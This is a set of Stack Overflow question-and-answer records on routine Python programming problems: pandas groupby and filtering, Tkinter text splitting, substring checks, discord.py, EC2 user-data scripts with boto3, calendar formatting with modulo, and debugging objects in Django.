Dataset image Please help, I have a dataset in which I have columns Country, Gas and Year from 2019 to 1991. Also attaching the snapshot of the dataset. I want to answer a question that I want to add all the values of a country column wise? For example, for Afghanistan, value should come 56.4 under 2019 (adding 28.79 + 6.23 + 16.37 + 5.01 = 56.4). Now I want it should calculate the result for every year. I have used below code for achieving 2019 data. df.groupby(by='Country')['2019'].sum() This is the output of that code: Country --------------------- Afghanistan 56.40 Albania 17.31 Algeria 558.67 Andorra 1.18 Angola 256.10 ... Venezuela 588.72 Vietnam 868.40 Yemen 50.05 Zambia 182.08 Zimbabwe 235.06 I have group the data country wise and adding the 2019 column values, but how should I add values of other years in single line of code? Please help. I can do the code shown here, to add rows and show multiple columns like this but this will be tedious task to do so write each column name. df.groupby(by='Country')[['2019','2018','2017']].sum()
[ "If you don't specify the column, it will sum all the numeric column.\ndf.groupby(by='Country').sum() \n\n 2019 2020 ...\nCountry\nAfghanistan 56.40 32.4 ...\nAlbania 17.31 12.5 ...\nAlgeria 558.67 241.5 ...\nAndorra 1.18 1.5 ...\nAngola 256.10 32.1 ...\n ... ... ...\nVenezuela 588.72 247.3 ...\nVietnam 868.40 323.5 ...\nYemen 50.05 55.7 ...\nZambia 182.08 23.4 ...\nZimbabwe 235.06 199.4 ...\n\nDo a reset_index() to flatten the columns\ndf.groupby(by='Country').sum().reset_index()\n\nCountry 2020 2019 ...\nAfghanistan 56.40 32.4 ...\nAlbania 17.31 12.5 ...\nAlgeria 558.67 241.5 ...\nAndorra 1.18 1.5 ...\nAngola 256.10 32.1 ...\n ... ... ...\nVenezuela 588.72 247.3 ...\nVietnam 868.40 323.5 ...\nYemen 50.05 55.7 ...\nZambia 182.08 23.4 ...\nZimbabwe 235.06 199.4 ...\n\n", "You can select columns keys in your dataframe starting from column 2019 till the last column key in this way:\ndf.groupby(by='Country')[df.keys()[2:]].sum() \n\nMethod df.keys will return all dataframe columns keys in a list then you can slice it from the index of 2019 key which is 2 till end of columns keys.\nSuppose you want to select columns from 2016 till 1992 column:\ndf.groupby(by='Country')[df.keys()[5:-1]].sum() \n\nyou just need to slice the list of columns keys in correct index order.\n" ]
[ 0, 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074589124_dataframe_pandas_python.txt
Q: How do I split a file into lines by spaces using the Tkinter library in Python? I need to split a file into lines by spaces, using Tkinter's Text widget and I tried this: Text = Text.split(sep='\n'), but I get the error "type object 'Text' has no attribute 'split'" please, tell me how to solve this I tried to convert Text to string but no result A: You need to get the data out of the text widget with the get method, and then call split on what is returned. data = the_text_widget.get("1.0", "end-1c") Text = data.split(sep="\n")
How do I split a file into lines by spaces using the Tkinter library in Python?
I need to split a file into lines by spaces, using Tkinter's Text widget and I tried this: Text = Text.split(sep='\n'), but I get the error "type object 'Text' has no attribute 'split'" please, tell me how to solve this I tried to convert Text to string but no result
[ "You need to get the data out of the text widget with the get method, and then call split on what is returned.\ndata = the_text_widget.get(\"1.0\", \"end-1c\")\nText = data.split(sep=\"\\n\")\n\n" ]
[ 0 ]
[]
[]
[ "python", "tkinter" ]
stackoverflow_0074591782_python_tkinter.txt
Q: How to check whether string a is a substring of but not equal to string b? I know that if we would like to know whether string a is contained in b we can use: a in b When a equals to b, the above express still returns True. I would like an expression that would return False when a == b and return True when a is a substring of b. So I used the following expression: a in b and a != b I just wonder is there a simpler expression in Python that works in the same way? A: Not sure how efficient direct string comparisons are in Python, but assuming they are O(n) this should be reasonably efficient and still readable : len(a) < len(b) and a in b Likes the other answers it's also O(n), but the length operation should be O(1). It should also be better suited for edge cases (e.g. a being bigger than b) A: This is going to be a short answer, but it is what it is. What you have is enough. While there might be other alternatives, the way you did it is easy enough to understand, simple and more readable than anything else (of course this is subjective to each and everyone). IMO a simpler expression in Python that works in the same way doesn't exist. That's just my personal perspective on this subject. I'm usually encouraged to follow KISS: The KISS principle states that most systems work best if they are kept simple rather than made complicated; therefore simplicity should be a key goal in design and unnecessary complexity should be avoided. As an example, the other answer it's not any different from the explicit and, and the chaining can be confusing when used with in and == because many people will see that as (a1 in b) != a1, at least at first glance. A: b.find(a) > 0 or b.startswith(a) and len(b) > len(a) I'm not saying this is the best answer. It's just another solution. The OP's statement is as good as any. The accepted answer is also good. But this one does work and demonstrates a different approach to the problem.
How to check whether string a is a substring of but not equal to string b?
I know that if we would like to know whether string a is contained in b we can use: a in b When a equals to b, the above express still returns True. I would like an expression that would return False when a == b and return True when a is a substring of b. So I used the following expression: a in b and a != b I just wonder is there a simpler expression in Python that works in the same way?
[ "Not sure how efficient direct string comparisons are in Python, but assuming they are O(n) this should be reasonably efficient and still readable :\nlen(a) < len(b) and a in b\n\nLikes the other answers it's also O(n), but the length operation should be O(1). It should also be better suited for edge cases (e.g. a being bigger than b)\n", "This is going to be a short answer, but it is what it is. What you have is enough. \nWhile there might be other alternatives, the way you did it is easy enough to understand, simple and more readable than anything else (of course this is subjective to each and everyone). IMO a simpler expression in Python that works in the same way doesn't exist. That's just my personal perspective on this subject. I'm usually encouraged to follow KISS:\n\nThe KISS principle states that most systems work best if they are kept\n simple rather than made complicated; therefore simplicity should be a\n key goal in design and unnecessary complexity should be avoided.\n\nAs an example, the other answer it's not any different from the explicit and, and the chaining can be confusing when used with in and == because many people will see that as (a1 in b) != a1, at least at first glance.\n", "b.find(a) > 0 or b.startswith(a) and len(b) > len(a)\nI'm not saying this is the best answer. It's just another solution. The OP's statement is as good as any. The accepted answer is also good. But this one does work and demonstrates a different approach to the problem.\n" ]
[ 4, 1, 0 ]
[]
[]
[ "python" ]
stackoverflow_0044393537_python.txt
Q: How can I make a discord bot take a message and turn it into a varable? Please be forgivable with my code, this is my first ever project with py. I'd like it to turn a message user like "/channel http://youtube.com@youtube" to a variable like "channelID" that can be used later in the py. I'm working with this so far. import discord import re import easygui from easygui import * from re import search from urllib.request import urlopen from bs4 import BeautifulSoup import requests import re import json import base64 import os import webbrowser import pyperclip import win32com.client as comclt import time import pyautogui import discord intents = discord.Intents.all() client = discord.Client(command_prefix='!', intents=intents) @client.event async def on_ready(): print('We have logged in as {0.user}'.format(client)) client.run('token') @client.event async def on_message(message): if message.author == client.user: return if message.content.startswith('/channel '): channelURL = message.content() if search("http", channelURL): if re.search("://", channelURL): if re.search("youtu", channelURL): # Loads page data # soup = BeautifulSoup(requests.get(channelURL, cookies={'CONSENT': 'YES+1'}).text, "html.parser") data = re.search(r"var ytInitialData = ({.*});", str(soup.prettify())).group(1) json_data = json.loads(data) # Finds channel information # channel_id = json_data["header"]["c4TabbedHeaderRenderer"]["channelId"] channel_name = json_data["header"]["c4TabbedHeaderRenderer"]["title"] channel_logo = json_data["header"]["c4TabbedHeaderRenderer"]["avatar"]["thumbnails"][2]["url"] channel_id_link = "https://youtube.com/channel/"+channel_id # Prints Channel information to console # print("Channel ID: "+channel_id) print("Channel Name: "+channel_name) print("Channel Logo: "+channel_logo) print("Channel ID: "+channel_id_link) # Creates HTML file var# f = open('channelid.html','w') # Converts and downlaods image file to png # imgUrl = channel_logo filename = "image.png".split('/')[-1] r = requests.get(imgUrl, allow_redirects=True) open(filename, 'wb').write(r.content) await message.channel.send(channel_id_link) I tried to use if message.content.startswith('/channel '): and channelURL = message.content() But I know I'm missing something really simple. I just can't put my finger on it. I was channelURL = message.content() to store the variable of if message.content.startswith('/channel '): A: discord.Message.content is a str and can't be called like a function i.e., message.content(). Use channelURL = message.content instead. Remember to enable message content intents.
How can I make a discord bot take a message and turn it into a varable?
Please be forgivable with my code, this is my first ever project with py. I'd like it to turn a message user like "/channel http://youtube.com@youtube" to a variable like "channelID" that can be used later in the py. I'm working with this so far. import discord import re import easygui from easygui import * from re import search from urllib.request import urlopen from bs4 import BeautifulSoup import requests import re import json import base64 import os import webbrowser import pyperclip import win32com.client as comclt import time import pyautogui import discord intents = discord.Intents.all() client = discord.Client(command_prefix='!', intents=intents) @client.event async def on_ready(): print('We have logged in as {0.user}'.format(client)) client.run('token') @client.event async def on_message(message): if message.author == client.user: return if message.content.startswith('/channel '): channelURL = message.content() if search("http", channelURL): if re.search("://", channelURL): if re.search("youtu", channelURL): # Loads page data # soup = BeautifulSoup(requests.get(channelURL, cookies={'CONSENT': 'YES+1'}).text, "html.parser") data = re.search(r"var ytInitialData = ({.*});", str(soup.prettify())).group(1) json_data = json.loads(data) # Finds channel information # channel_id = json_data["header"]["c4TabbedHeaderRenderer"]["channelId"] channel_name = json_data["header"]["c4TabbedHeaderRenderer"]["title"] channel_logo = json_data["header"]["c4TabbedHeaderRenderer"]["avatar"]["thumbnails"][2]["url"] channel_id_link = "https://youtube.com/channel/"+channel_id # Prints Channel information to console # print("Channel ID: "+channel_id) print("Channel Name: "+channel_name) print("Channel Logo: "+channel_logo) print("Channel ID: "+channel_id_link) # Creates HTML file var# f = open('channelid.html','w') # Converts and downlaods image file to png # imgUrl = channel_logo filename = "image.png".split('/')[-1] r = requests.get(imgUrl, allow_redirects=True) open(filename, 'wb').write(r.content) await message.channel.send(channel_id_link) I tried to use if message.content.startswith('/channel '): and channelURL = message.content() But I know I'm missing something really simple. I just can't put my finger on it. I was channelURL = message.content() to store the variable of if message.content.startswith('/channel '):
[ "discord.Message.content is a str and can't be called like a function i.e., message.content().\nUse channelURL = message.content instead.\nRemember to enable message content intents.\n" ]
[ 2 ]
[]
[]
[ "bots", "discord.py", "python" ]
stackoverflow_0074592407_bots_discord.py_python.txt
Q: Failing: Duplicates issues while looking for a smallest value with .idxmin() Sample Data: Fitness Value MSU Locations MSU Range 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.226040 {1, 22, 30} 1.871269 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.143814 {26, 19, 20} 2.223852 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.143814 {26, 19, 20} 2.223852 I am trying to find a minimum value in Fitness Value column and keeping the whole row record. Sample Code: WATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].idxmin()] WATT Output: Fitness Value MSU Locations MSU Range 1.045426 {13, 38, 15} 2.213424 1.158718 {29, 22, 39} 2.143414 1.045426 {13, 38, 15} 2.213424 1.139776 {18, 3, 23} 1.599072 1.045426 {13, 38, 15} 2.213424 1.136302 {17, 10, 13} 2.217177 I want to print only the smallest value but its print multiple values (also duplicates). Any solution? A: Try to use the following code, it handles duplicates. WATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].eq(df['Fitness Value'].min())] WATT
Failing: Duplicates issues while looking for a smallest value with .idxmin()
Sample Data: Fitness Value MSU Locations MSU Range 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.226040 {1, 22, 30} 1.871269 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.143814 {26, 19, 20} 2.223852 1.045426 {13, 38, 15} 2.213424 1.096542 {9, 38, 39} 2.226205 1.143814 {26, 19, 20} 2.223852 I am trying to find a minimum value in Fitness Value column and keeping the whole row record. Sample Code: WATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].idxmin()] WATT Output: Fitness Value MSU Locations MSU Range 1.045426 {13, 38, 15} 2.213424 1.158718 {29, 22, 39} 2.143414 1.045426 {13, 38, 15} 2.213424 1.139776 {18, 3, 23} 1.599072 1.045426 {13, 38, 15} 2.213424 1.136302 {17, 10, 13} 2.217177 I want to print only the smallest value but its print multiple values (also duplicates). Any solution?
[ "Try to use the following code, it handles duplicates.\nWATT = df_min_value_in_each_generation.loc[df_min_value_in_each_generation['Fitness Value'].eq(df['Fitness Value'].min())]\n\nWATT\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "genetic_algorithm", "genetic_programming", "pandas", "python" ]
stackoverflow_0074592409_dataframe_genetic_algorithm_genetic_programming_pandas_python.txt
Q: how I can change whitespaces between words of a string in print order? i was writing a code to input a sentence of user then change its whitespaces to ... and print the sentence. hi rocks I intended to input a sentence and change its whitespaces to "..." I wrote this code: a=input("inter your sentence: ") #split in to n str #print every str with ... as whitespace a=a.split() for x in a: print(x, sep='...',end="") if I input this is a test, i expected to see this...is...a...test but it doesn't work it gives me "thisisatest A: str.replace can be used to replace one or multiple characters of same ASCII value to another. In your case, it would be: a=input("inter your sentence: ") a=a.replace(' ', '...') print(a) A: do this. a=input("inter your sentence: ") #split in to n str #print every str with ... as whitespace a=a.split() print(*a, sep='...') Or do this. a=input("inter your sentence: ") #split in to n str #print every str with ... as whitespace a=a.split() final_a = '...'.join(a) print(final_a) OUTPUT (for input this is a test) this...is...a...test Replying OP's comment. "so what you think about this one for x in range(0,10): print (x ,sep='...', end="") it didn't work too" for x in range(0,10): print(x ,sep='...', end="") Note: sep seprate args provide in print method, Default sep=" " Example: print("one","1", sep="-->") # Output: one-->1 And end: When every args print in terminal then print see the end value and print it in terminal. Default end="\n" \n → newline Example: for a in range(0, 10): print(a, end=".|.") #Output= 0.|.1.|.2.|.3.|.4.|.5.|.6.|.7.|.8.|.9.|. # Here when 0 prints then print method also print `end`'s value after that, and 1 then `end`'s value and so on. Answer for your comment's question can be this. for x in range(0,10): print(x,end='...') Output As I say end's value print after every print method args print, so '...' also prints after x last value(9). 0...1...2...3...4...5...6...7...8...9... A: You can make use of the Python join and split functions in this case: The code snippet: inputSentence = input("Enter your sentence: ") print("...".join(inputSentence.split())) The output: Enter your sentence: This is a test This...is...a...test
how I can change whitespaces between words of a string in print order?
i was writing a code to input a sentence of user then change its whitespaces to ... and print the sentence. hi rocks I intended to input a sentence and change its whitespaces to "..." I wrote this code: a=input("inter your sentence: ") #split in to n str #print every str with ... as whitespace a=a.split() for x in a: print(x, sep='...',end="") if I input this is a test, i expected to see this...is...a...test but it doesn't work it gives me "thisisatest
[ "str.replace can be used to replace one or multiple characters of same ASCII value to another. In your case, it would be:\na=input(\"inter your sentence: \")\na=a.replace(' ', '...')\nprint(a)\n\n", "do this.\na=input(\"inter your sentence: \")\n#split in to n str\n#print every str with ... as whitespace\na=a.split()\nprint(*a, sep='...')\n\nOr do this.\na=input(\"inter your sentence: \")\n#split in to n str\n#print every str with ... as whitespace\na=a.split()\nfinal_a = '...'.join(a)\nprint(final_a)\n\nOUTPUT (for input this is a test)\nthis...is...a...test\n\n\nReplying OP's comment. \"so what you think about this one for x in range(0,10): print (x ,sep='...', end=\"\") it didn't work too\"\nfor x in range(0,10):\n print(x ,sep='...', end=\"\")\n\nNote: sep seprate args provide in print method, Default sep=\" \"\nExample:\nprint(\"one\",\"1\", sep=\"-->\")\n# Output: one-->1\n\nAnd end: When every args print in terminal then print see the end value and print it in terminal. Default end=\"\\n\" \\n → newline\nExample:\nfor a in range(0, 10):\n print(a, end=\".|.\")\n\n#Output= 0.|.1.|.2.|.3.|.4.|.5.|.6.|.7.|.8.|.9.|. \n\n# Here when 0 prints then print method also print `end`'s value after that, and 1 then `end`'s value and so on.\n\nAnswer for your comment's question can be this.\nfor x in range(0,10):\n print(x,end='...')\n\nOutput\nAs I say end's value print after every print method args print, so '...' also prints after x last value(9).\n0...1...2...3...4...5...6...7...8...9...\n\n", "You can make use of the Python join and split functions in this case:\nThe code snippet:\ninputSentence = input(\"Enter your sentence: \")\n\nprint(\"...\".join(inputSentence.split()))\n\n\nThe output:\nEnter your sentence: This is a test\n\nThis...is...a...test\n\n" ]
[ 0, 0, 0 ]
[]
[]
[ "printf", "python", "string" ]
stackoverflow_0074592503_printf_python_string.txt
Q: Execute python script at launch time on Amazon Linux 2 I am trying to execute a python script on an Amazon Linux 2 instance. In my user-data section I have a script which copies the python script from an S3 bucket to the instance and executes it like so: #!/bin/bash # e - stops the script if there is an error # x - output every command in /var/log/syslog set -e -x # set AWS region echo "export AWS_DEFAULT_REGION=us-east-1" >> /etc/profile source /etc/profile # copy python script from the s3 bucket aws s3 cp s3://${bucket_name}/ /home/ec2-user --recursive sudo python3 my_python_script.py The problem is that the python script doesn't seem to be getting executed at all. Note: the python script gets copied fine from the bucket What I am missing here? UPDATE: after checking /var/log/cloud-init-output.log it looks like the problem is in the python script, it cannot find the boto3 module: + python3 /home/ec2-user/my_python_script.py Traceback (most recent call last): File "/home/ec2-user/my_python_script.py", line 1, in <module> import boto3 ModuleNotFoundError: No module named 'boto3' Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Failed running /var/lib/cloud/instance/scripts/part-001 [1] Dec 10 15:52:25 cloud-init[3697]: cc_scripts_user.py[WARNING]: Failed to run module scripts-user (scripts in /var/lib/cloud/instance/scripts) Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Running module scripts-user (<module 'cloudinit.config.cc_scripts_user' from '/usr/lib/python2.7/site-packages/cloudinit/config/cc_scripts_user.pyc'>) failed The problem is that I do have boto3 module installed. I created a custom AMI image that does have all of the modules installed (I used pip3 to install them) before creating the custom AMI image UPDATE2 I verified that the image does have boto3 package installed in the python3 library: [ec2-user@ip-ip ~]$ python3 Python 3.7.9 (default, Aug 27 2020, 21:59:41) [GCC 7.3.1 20180712 (Red Hat 7.3.1-9)] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import boto3 >>> UPDATE3 The cause of the problem was that I installed the boto3 package for my user only (i.e. pip3 install boto3 --user) and then I created the AMI image. So after adding the bellow line to my user-data script it worked fine #!/bin/bash ... sudo pip3 install boto3 sudo python3 my_python_script.py A: You can redirect output to a file and read it to see the error: did you have python3, did your instance have credentianl/role to access this bucket, did you script requires any third party, can you try to run the script above as root in local first, the run command should be python3 /home/ec2-user/my_python_script.py? A: For anyone who is using cloudinit and terraform, this is how I managed it to work (one part of multipart cloudinit user data)- part { content_type = "text/x-shellscript" filename = "run_src.sh" content = <<-EOF #!/bin/bash cd /root mkdir tmp mkdir tmp/origin mkdir tmp/converted mkdir tmp/packaged pip3 install boto3 cd src python3 main.py EOF } And it works like charm.
Execute python script at launch time on Amazon Linux 2
I am trying to execute a python script on an Amazon Linux 2 instance. In my user-data section I have a script which copies the python script from an S3 bucket to the instance and executes it like so: #!/bin/bash # e - stops the script if there is an error # x - output every command in /var/log/syslog set -e -x # set AWS region echo "export AWS_DEFAULT_REGION=us-east-1" >> /etc/profile source /etc/profile # copy python script from the s3 bucket aws s3 cp s3://${bucket_name}/ /home/ec2-user --recursive sudo python3 my_python_script.py The problem is that the python script doesn't seem to be getting executed at all. Note: the python script gets copied fine from the bucket What I am missing here? UPDATE: after checking /var/log/cloud-init-output.log it looks like the problem is in the python script, it cannot find the boto3 module: + python3 /home/ec2-user/my_python_script.py Traceback (most recent call last): File "/home/ec2-user/my_python_script.py", line 1, in <module> import boto3 ModuleNotFoundError: No module named 'boto3' Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Failed running /var/lib/cloud/instance/scripts/part-001 [1] Dec 10 15:52:25 cloud-init[3697]: cc_scripts_user.py[WARNING]: Failed to run module scripts-user (scripts in /var/lib/cloud/instance/scripts) Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Running module scripts-user (<module 'cloudinit.config.cc_scripts_user' from '/usr/lib/python2.7/site-packages/cloudinit/config/cc_scripts_user.pyc'>) failed The problem is that I do have boto3 module installed. I created a custom AMI image that does have all of the modules installed (I used pip3 to install them) before creating the custom AMI image UPDATE2 I verified that the image does have boto3 package installed in the python3 library: [ec2-user@ip-ip ~]$ python3 Python 3.7.9 (default, Aug 27 2020, 21:59:41) [GCC 7.3.1 20180712 (Red Hat 7.3.1-9)] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import boto3 >>> UPDATE3 The cause of the problem was that I installed the boto3 package for my user only (i.e. pip3 install boto3 --user) and then I created the AMI image. So after adding the bellow line to my user-data script it worked fine #!/bin/bash ... sudo pip3 install boto3 sudo python3 my_python_script.py
[ "You can redirect output to a file and read it to see the error: did you have python3, did your instance have credentianl/role to access this bucket, did you script requires any third party, can you try to run the script above as root in local first, the run command should be python3 /home/ec2-user/my_python_script.py?\n", "For anyone who is using cloudinit and terraform, this is how I managed it to work (one part of multipart cloudinit user data)-\npart {\n content_type = \"text/x-shellscript\"\n filename = \"run_src.sh\"\n content = <<-EOF\n #!/bin/bash\n cd /root\n mkdir tmp\n mkdir tmp/origin\n mkdir tmp/converted\n mkdir tmp/packaged\n \n pip3 install boto3\n cd src\n\n python3 main.py\n\n EOF\n }\n\nAnd it works like charm.\n" ]
[ 1, 0 ]
[]
[]
[ "amazon_web_services", "python" ]
stackoverflow_0065237455_amazon_web_services_python.txt
Q: Count issue due to variable not operating properly, subtracting or adding wrong This is the setup for a calendar, is there a better way to create a count? for k,v in months.items(): print(k) # print the month name print(month_header) while month_daycount > 7: month_daycount -= 7 count = month_daycount A: I'm not sure about your code specifically, but I feel that your code could be greatly simplified by using the datetime library of Python. You could then simply use the delta function to iterate over the days and as you already have the formatting defined, your problem would be solved! A: You are in desperate need of the modulo operator to get your columns lined up! If you are not familiar, do a little google searching, but the essence is that the modulo operator returns the remainder when doing division and is commonly used for things that roll over, like converting a large number of hours into the time of day using modulo to remove the number of days. In python the modulo operator is %. For example, using a 24 hour clock, and a starting time of 15, if I want to add 100 hours and know what time it is I can: (15 + 100) % 24 # 19 to see that the new time is 1900hrs (7pm), which is the remainder after dividing by 24. You can use this to keep track of what column you are in, as long as you keep a running total of the items printed. Here is a toy example you can incorporate in your code with some modification: Code: periods = [8,15,17,20] row_length = 7 total_chars = 0 for period in periods: # find the current column using modulo to get the remainder current_column = total_chars % row_length # add n tabs to set first col print('\t' * current_column, end='') for day_count in range(1, period+1): print(day_count, end='\t') total_chars += 1 if total_chars % row_length == 0: # use modulo again to see if we are at end of row, 0 remainder... print() print('\na new period has started!') Output: 1 2 3 4 5 6 7 8 a new period has started! 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 a new period has started! 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 a new period has started! 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 a new period has started!
Count issue due to variable not operating properly, subtracting or adding wrong
This is the setup for a calendar, is there a better way to create a count? for k,v in months.items(): print(k) # print the month name print(month_header) while month_daycount > 7: month_daycount -= 7 count = month_daycount
[ "I'm not sure about your code specifically, but I feel that your code could be greatly simplified by using the datetime library of Python. You could then simply use the delta function to iterate over the days and as you already have the formatting defined, your problem would be solved!\n", "You are in desperate need of the modulo operator to get your columns lined up!\nIf you are not familiar, do a little google searching, but the essence is that the modulo operator returns the remainder when doing division and is commonly used for things that roll over, like converting a large number of hours into the time of day using modulo to remove the number of days. In python the modulo operator is %. For example, using a 24 hour clock, and a starting time of 15, if I want to add 100 hours and know what time it is I can:\n(15 + 100) % 24\n# 19\n\nto see that the new time is 1900hrs (7pm), which is the remainder after dividing by 24.\nYou can use this to keep track of what column you are in, as long as you keep a running total of the items printed. Here is a toy example you can incorporate in your code with some modification:\nCode:\nperiods = [8,15,17,20]\nrow_length = 7\n\ntotal_chars = 0\nfor period in periods:\n # find the current column using modulo to get the remainder\n current_column = total_chars % row_length\n # add n tabs to set first col\n print('\\t' * current_column, end='') \n for day_count in range(1, period+1):\n print(day_count, end='\\t')\n total_chars += 1\n if total_chars % row_length == 0: # use modulo again to see if we are at end of row, 0 remainder...\n print()\n print('\\na new period has started!')\n\nOutput:\n1 2 3 4 5 6 7 \n8 \na new period has started!\n 1 2 3 4 5 6 \n7 8 9 10 11 12 13 \n14 15 \na new period has started!\n 1 2 3 4 5 \n6 7 8 9 10 11 12 \n13 14 15 16 17 \na new period has started!\n 1 2 \n3 4 5 6 7 8 9 \n10 11 12 13 14 15 16 \n17 18 19 20 \na new period has started!\n\n" ]
[ 0, 0 ]
[]
[]
[ "count", "modulo", "python" ]
stackoverflow_0074592406_count_modulo_python.txt
Q: Why is df.drop dropping more rows than it should I have a data frame (other_team_df) of premier league teams and I want to drop rows where the home team is either: Arsenal, Chelsea, Liverpool, Tottenham, Man City or Man United. When I run the code below, del_row_index has length=1596 and other_team_df has 5321 rows. So im expecting 3725 rows to be left after the drop. However, I only get back 72 rows and I'm not sure why del_row_index=other_team_df[(other_team_df['HomeTeam']=='Arsenal') |(other_team_df['HomeTeam']=='Chelsea')| (other_team_df['HomeTeam']=='Liverpool') |(other_team_df['HomeTeam']=='Tottenham')| (other_team_df['HomeTeam']=='Man City')| (other_team_df['HomeTeam']=='Man United')].index other_team_df.drop(del_row_index) A: Use isin and boolean indexing: to_drop = ['Arsenal', 'Chelsea', 'Liverpool', 'Tottenham', 'Man City', 'Man United'] out = other_team_df.loc[~other_team_df['HomeTeam'].isin(to_drop)]
Why is df.drop dropping more rows than it should
I have a data frame (other_team_df) of premier league teams and I want to drop rows where the home team is either: Arsenal, Chelsea, Liverpool, Tottenham, Man City or Man United. When I run the code below, del_row_index has length=1596 and other_team_df has 5321 rows. So im expecting 3725 rows to be left after the drop. However, I only get back 72 rows and I'm not sure why del_row_index=other_team_df[(other_team_df['HomeTeam']=='Arsenal') |(other_team_df['HomeTeam']=='Chelsea')| (other_team_df['HomeTeam']=='Liverpool') |(other_team_df['HomeTeam']=='Tottenham')| (other_team_df['HomeTeam']=='Man City')| (other_team_df['HomeTeam']=='Man United')].index other_team_df.drop(del_row_index)
[ "Use isin and boolean indexing:\nto_drop = ['Arsenal', 'Chelsea', 'Liverpool', 'Tottenham', 'Man City', 'Man United']\n\nout = other_team_df.loc[~other_team_df['HomeTeam'].isin(to_drop)]\n\n" ]
[ 0 ]
[]
[]
[ "delete_row", "drop", "pandas", "python", "row" ]
stackoverflow_0074592646_delete_row_drop_pandas_python_row.txt
Q: Laravel's dd() equivalent in django I am new in Django and having a hard time figuring out how to print what an object have inside. I mean type and value of the variable with its members inside. Just like Laravel's dd(object) function. Laravel's dd() is a handy tool for debugging the application. I have searched for it. But found nothing useful. I have tried pprint(), simplejson, print(type(object) and {% debug %}. But none of them could provide the required information about an object. Here is a sample output from Laravel's dd() function. In this Image, I am printing the request object of Laravel. as you can see its showing complete information about an object. I mean name of class it belongs to, its member variables. also with its class name and value. and it keeps digging deep inside the object and prints all the information. But I am not able to find a similar tool in Django. That's hard to believe that Django doesn't have such a useful tool. Therefore I would like to know about any third party package that can do the trick. I am using Django version 2.0.5. and trying to print django.contrib.messages Also, I want the output to be displayed in the browser, not in the console. In a well readable way that's why I am asking for a Django package that can take in the object and render a well-formed presentation of object architecture. A: You are looking for __dict__ property or dir() print(object.__dict__) Use pprint for beautified output from pprint import pprint pprint(dir(object)) A: Raise an exception. Assuming you've got debug on you'll see the exception message. It's crude but it's helped me in the past. Just: raise Exception("I want to know the value of this: " + myvariable_as_a_string) Other answers & commenters ignored the crucial "and die" part of the dd() function, which prevents things like subsequent redirects. A: Actually Django does not provide this specialized function. So in order to get rid of this problem, I made a custom dd() type function and use this in all Django projects. Perhaps it can help someone. Let's assume, we have a library folder named app_libs and in that folder we have a library file named dump.py. Like app_libs > dump.py: from django.core import serializers from collections.abc import Iterable from django.db.models.query import QuerySet from django.core.exceptions import ObjectDoesNotExist def dd(request, data=''): try: scheme = request.scheme server_name = request.META['SERVER_NAME'] server_port = request.META['SERVER_PORT'] remote_addr = request.META['REMOTE_ADDR'] user_agent = request.META['HTTP_USER_AGENT'] path = request.path method = request.method session = request.session cookies = request.COOKIES get_data = {} for key, value in request.GET.lists(): get_data[key] = value post_data = {} for key, value in request.POST.lists(): post_data[key] = value files = {} for key, value in request.FILES.lists(): files['name'] = request.FILES[key].name files['content_type'] = request.FILES[key].content_type files['size'] = request.FILES[key].size dump_data = '' query_data = '' executed_query = '' if data: if isinstance(data, Iterable): if isinstance(data, QuerySet): executed_query = data.query query_data = serializers.serialize('json', data) else: dump_data = dict(data) else: query_data = serializers.serialize('json', [data]) msg = f''' <html> <span style="color: red;"><b>Scheme</b></span> : <span style="color: blue;">{scheme}</span><br> <span style="color: red;"><b>Server Name</b></span> : <span style="color: blue;">{server_name}</span><br> <span style="color: red;"><b>Server Port</b></span> : <span style="color: blue;">{server_port}</span><br> <span style="color: red;"><b>Remote Address</b></span>: <span style="color: blue;">{remote_addr}</span><br> <span style="color: red;"><b>User Agent</b></span> : <span style="color: blue;">{user_agent}</span><br> <span style="color: red;"><b>Path</b></span> : <span style="color: blue;">{path}</span><br> <span style="color: red;"><b>Method</b></span> : <span style="color: blue;">{method}</span><br> <span style="color: red;"><b>Session</b></span> : <span style="color: blue;">{session}</span><br> <span style="color: red;"><b>Cookies</b></span> : <span style="color: blue;">{cookies}</span><br> <span style="color: red;"><b>Get Data</b></span> : <span style="color: blue;">{get_data}</span><br> <span style="color: red;"><b>Post Data</b></span> : <span style="color: blue;">{post_data}</span><br> <span style="color: red;"><b>Files</b></span> : <span style="color: blue;">{files}</span><br> <span style="color: red;"><b>Executed Query</b></span>: <span style="color: blue;"><br>{executed_query}</span><br> <span style="color: red;"><b>Query Data</b></span> : <span style="color: blue;"><br>{query_data}</span><br> <span style="color: red;"><b>Dump Data</b></span> : <span style="color: blue;"><br>{dump_data}</span><br> </html> ''' return msg except ObjectDoesNotExist: return False when you need to use this function, just call it like this in any views.py: from django.http import HttpResponse from django.shortcuts import render from django.views import View from app_libs.dump import dd from .models import Products class ProductView(View): def get(self, request): data = {} data['page_title'] = 'products' data['products'] = Products.objects.get_all_product() template = 'products/collections.html' dump_data = dd(request, data['products']) return HttpResponse(dump_data) # return render(request, template, data) that's it. A: You can set breakpoint just after variable you need to inspect. # for example your code looks like ...other code products = Product.objects.all() # here you set a breakpoint breakpoint() ...other code Now you need to call you code in this exact location and due to breakpoint it stops. Then you want to look up in terminal, it switched to special mode where you need to enter code like this one: products.__dict__ # and hit enter. Now you'll see all properties in your variable. A: I was looking for something similar and there is this python package django-dump-die that provides exactly this, it was inspired from laravel. https://pypi.org/project/django-dump-die/0.1.5/
